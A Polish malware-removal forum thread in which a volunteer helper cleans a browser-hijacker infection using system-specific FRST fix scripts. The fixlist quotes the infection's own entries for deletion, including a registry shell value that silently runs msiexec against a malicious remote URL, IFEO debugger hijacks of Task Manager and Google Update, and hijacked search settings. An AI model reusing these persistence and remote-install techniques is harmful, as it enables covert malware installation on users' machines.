Skocz do zawartości

Wolne działanie komputera, wyszukiwarki w przeglądarkach


Rekomendowane odpowiedzi

Cześć. Proszę o pomoc w rozwiązaniu problemów z komputerem. Od jakiegoś czasu działa zauważalnie wolniej, w przeglądarkach po ich uruchomieniu włączają się jakieś wyszukiwarki. Usunąłem podejrzaną aplikację AlphaGo (dwa razy, były dwa wpisy w Dodaj/Usuń Programy, które dało się usunąć), a przy usuwaniu trzeciego otrzymuję komunikat (Źródło instalacji tego produktu nie jest dostępne. Sprawdź, czy źródło istnieje i czy masz do niego dostęp.)

 

W załączniku dodaję logi z FRST oraz GMER.

 

Z góry dziękuję za pomoc.

gmer.txt

Addition.txt

FRST.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Przeglądarki Mozilla FireFox oraz Google Chrome zostały zainfekowane w nowoczesny sposób, czyli poprzez wstawienie sfałszowanych kopii. Oprócz tego widoczne są inne, liczne modyfikacje infekcji. Szkodliwe usługi, skróty i wiele, wiele więcej.
 
Do poczytania, na przyszłość: KLIK.  
 
1. Deinstalacje.

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Doeye
RemoveDirectory: C:\Users\Karina\AppData\Roaming\Doeye
RemoveDirectory: C:\Users\Karina\AppData\Local\Doeye
HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Task: {13690C54-20FE-49E5-A944-39D79AD0407A} - \Windows-WoShiBeiYongDe -> Brak pliku Task: {46A26F52-4E73-4BCB-B637-FFD9196D3FEB} - System32\Tasks\{3E25F6F0-6803-4AAC-B178-F396B088A027} => pcalua.exe -a F:\AHDETH-00244228-0042.EXE -d F:\
Task: {BF80DEA7-CCB8-44B0-B7CA-5782941C5169} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () Task: {C51E8FD3-3718-403F-9F81-412FE2398FFB} - System32\Tasks\{A9A47BEE-1E85-4D3D-B0C7-052BA71A97AC} => pcalua.exe -a F:\AHDETH-00244228-0042.EXE -d F:\
Task: {C819146A-746A-4407-AC0D-60656A2D87CE} - \PowerWord-SCT-JT -> Brak pliku RemoveDirectory: C:\Program Files (x86)\MIO
ShortcutWithArgument: C:\Users\Karina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495644570&z=91de134c1d6e8157ba43528g7z0t3wbq6z3z0wamee&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S
C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
FirewallRules: [{1E2ED7E9-AFC7-4C03-8527-833431621303}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe
FirewallRules: [{DB9613CB-AD37-472E-B87A-F92D20075629}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{4AB25F3B-02D3-49F3-8ED0-70762CA84090}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{D9BA6956-3BF0-46BA-849B-E07952409818}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmk6459gsxp_z1i3s3j5sxxz1i3s3j5s.dat
FirewallRules: [{A40AE860-8FA6-4F17-87E1-2C71CE084CE8}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmk6459gsxp_z1i3s3j5sxxz1i3s3j5s.dat
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Karina\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Karina\AppData\Local\Firefox
HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Run: [background_fault] => HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Run: [background_fault] => C:\Users\Karina\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) C:\Users\Karina\AppData\Local\background_fault
HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj83MUM4NYVWRjRYFTF5OTRWOWzLFjQLFdk1NdH1RjVYFq== /q
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms}
HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms}
HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S
HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S
HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms}
FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Karina\AppData\Roaming\Mozilla\Firefox\Profiles\v9t3imds.default-1449957172719\extensions\arthurj8283@gmail.com
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll Brak pliku
S4 ANSARE; C:\Users\Karina\AppData\Local\ANSARE\Snare.dll [826368 2017-05-24] () [brak podpisu cyfrowego] R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [110592 2017-04-24] () [brak podpisu cyfrowego] R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-31] (TODO: ) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [99480 2017-05-26] () S4 NPASRE; C:\Users\Karina\AppData\Local\NPASRE\Snare.dll [830464 2017-05-24] () [brak podpisu cyfrowego] S2 terana; C:\Users\Karina\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S4 VNASRE; C:\Users\Karina\AppData\Local\VNASRE\Snare.dll [826368 2017-05-24] () [brak podpisu cyfrowego] C:\Users\Karina\AppData\Local\ANSARE
C:\ProgramData\Apple
C:\ProgramData\BIT
C:\Users\Karina\AppData\Local\NPASRE
C:\Users\Karina\AppData\Local\terana
S1 ccnfd_1_10_0_4; system32\drivers\ccnfd_1_10_0_4.sys [X]
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] C:\Program Files (x86)\Elex-tech
2017-05-27 17:57 - 2017-05-27 17:57 - 00000000 _____ C:\Windows\SysWOW64\55
2017-05-27 17:57 - 2017-04-25 13:05 - 00000000 _____ C:\Windows\SysWOW64\33
2017-05-27 17:56 - 2017-05-13 01:13 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-27 17:56 - 2017-05-09 22:49 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-27 17:56 - 2017-04-25 13:05 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-27 17:56 - 2017-04-25 13:00 - 00000000 ____D C:\Program Files (x86)\BiaoJi
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk
C:\Users\Karina\AppData\Roaming\Microsoft\Office\Niedawny\Nowy dokument sformatowany (2).LNK
C:\Users\Karina\Desktop\BigFarm.lnk
C:\Users\Karina\Desktop\big_bang_empire.lnk
C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk
C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk
DeleteKey: HKCU\Software\Doeye
DeleteKey: HKCU\Software\Firefox
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Doeye
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes
CMD: dir /a "C:\Program Files"
CMD: dir /a "C:\Program Files (x86)"
CMD: dir /a "C:\Program Files\Common Files\System"
CMD: dir /a "C:\Program Files (x86)\Common Files\System"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\Karina\AppData\Local
CMD: dir /a C:\Users\Karina\AppData\LocalLow
CMD: dir /a C:\Users\Karina\AppData\Roaming
EmptyTemp:

 
Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 
Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.
 

3. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin
  • Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok do kasacji modyfikacji infekcji.
  • Czyszczenie wyłączy wszystkie rozszerzenia, więc po dezynfekcji włączysz je sobie ponownie.

4. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox:

  • Odłącz synchronizację (o ile włączona): KLIK.
  • Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
  • Menu Historia > Wyczyść historię przeglądania.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.

5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).
 

doeye;firefox

 
Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.
 
6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Wykonałem wszystkie kroki. W załączniku przesyłam pliki o których pisałeś.

 

Nie mogłem usunąć jednej wyszukiwarki w Chrome:

mystarting123  (hxxp://xxx.mystarting123.com/search/index.php?z=fd8ad43eac969c9cdd67967g0zctbw2qaz1z1w9gfq&q=%s)
 
I nie mogę jej zamienić na Google jako domyślnej, wraca do tej mystarting123  

SearchReg.txt

Fixlog.txt

Addition.txt

FRST.txt

Shortcut.txt

Odnośnik do komentarza

Całość pomyślnie wykonana. Wygląda to już o wiele lepiej. 

 

Poprawki, czyli kasacja szczątkowych wpisów oraz reinstalacja przeglądarki ze względu na modyfikacje preferencji. 

 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

CreateRestorePoint:
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7CB7055-EFAE-4CD2-928A-15DB5F4FF7C7}
DeleteKey: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\502c3617_0
DeleteKey: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\180eb0f9_0
DeleteValue: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Doeye\Application\chrome.exe
C:\Users\Karina\AppData\Local\CWASRE
C:\Users\Karina\AppData\Local\snare
C:\Users\Karina\AppData\Local\VNASRE
C:\Users\Karina\AppData\Local\WindowsUpdate
C:\Users\Karina\AppData\Roaming\SSMgre
C:\Users\Karina\AppData\Roaming\WinSAPSvc
C:\Users\Karina\AppData\Roaming\WMM
C:\Program Files\MK
C:\Program Files (x86)\AlphaGo
C:\Users\Public\Documents\report.dat
C:\Users\Public\Documents\temp.dat
C:\Windows\SysWOW64\last.dump

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go.

 

2. Kompleksowo wg poniższej instrukcji przeinstaluj przeglądarkę Google Chrome.

  • Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK.
  • Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML.
  • Odinstaluj Google Chrome (czyli Panel Sterowanie > Odinstaluj program). Przy deinstalacji zaznacz Usuń także dane przeglądarki.
  • Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK.
3. Uruchom AdwCleaner. Na razie wybierz tylko opcję Szukaj (nie stosuj jeszcze Oczyść) i dostarcz log z folderu C:\AdwCleaner.
Odnośnik do komentarza

Wykonałem wskazane kroki. W załączniku przesyłam logi. Zauważyłem także że w Firefox po wpisaniu adresu google.pl otrzymuję błąd 301, po wpisaniu www.google.pl błąd 302 i tylko jak wejdę przez https to uruchamia mi się strona google. Czy to może być też związane jeszcze z infekcją?

 

PS: Odinstalowanie Google Chrome mimo zaznaczonej opcji 'Usuń także dane przeglądarki.' nie pomagało i nadal była tam wyszukiwarka mystarting123. Po odinstalowaniu ponownie Chrome usunąłem cały folder Google Chrome z AppData/Roaming i teraz po instalacji nie ma już wyszukiwarki.

AdwCleanerS0.txt

Fixlog.txt

Odnośnik do komentarza

Zauważyłem także że w Firefox po wpisaniu adresu google.pl otrzymuję błąd 301, po wpisaniu www.google.pl błąd 302 i tylko jak wejdę przez https to uruchamia mi się strona google. Czy to może być też związane jeszcze z infekcją?

 

Póki co korzystaj z innej przeglądarki, daj mi czas, bo muszę coś wykombinować (ale sprawdź co będzie jeśli przeinstalujesz przeglądarkę).

 

Zobacz na post picasso.

 

PS: Odinstalowanie Google Chrome mimo zaznaczonej opcji 'Usuń także dane przeglądarki.' nie pomagało i nadal była tam wyszukiwarka mystarting123. Po odinstalowaniu ponownie Chrome usunąłem cały folder Google Chrome z AppData/Roaming i teraz po instalacji nie ma już wyszukiwarki.

OK, najważniejsze, że się tego pozbyłeś. 

 

Zagrożenia wykryte przez AdwCleaner daj do kasacji. 

I napisz mi jak wygląda obecnie sytuacja? Czy oprócz problemów z FireFoxem coś jeszcze wymaga korekty?

Z mojego punktu widzenia już wszystko jest OK.

Odnośnik do komentarza

Wykonałem wskazane kroki. W załączniku przesyłam logi. Zauważyłem także że w Firefox po wpisaniu adresu google.pl otrzymuję błąd 301, po wpisaniu www.google.pl błąd 302 i tylko jak wejdę przez https to uruchamia mi się strona google. Czy to może być też związane jeszcze z infekcją?

Po pierwsze, strona Google domyślnie działa już tylko w systemie https a nie http. To co jest tu nie w porządku to fakt, że wklepując te adresy bez prefiksu https nie zostajesz automatycznie przekierowany przez przeglądarkę na wariant z https tylko dostajesz błąd otwierania http (co jest spodziewane). Ten problem w teorii się rozwiązuje poprzez rekonfigurację niektórych preferencji Firefoxa, ale:

 

Masz starą wersję przeglądarki:

 

Mozilla Firefox 45.0.1 (x86 pl) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 pl)) (Version: 45.0.1 - Mozilla)

 

Najnowsza to Firefox 54. Zacznij od instalacji najnowszej wersji.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...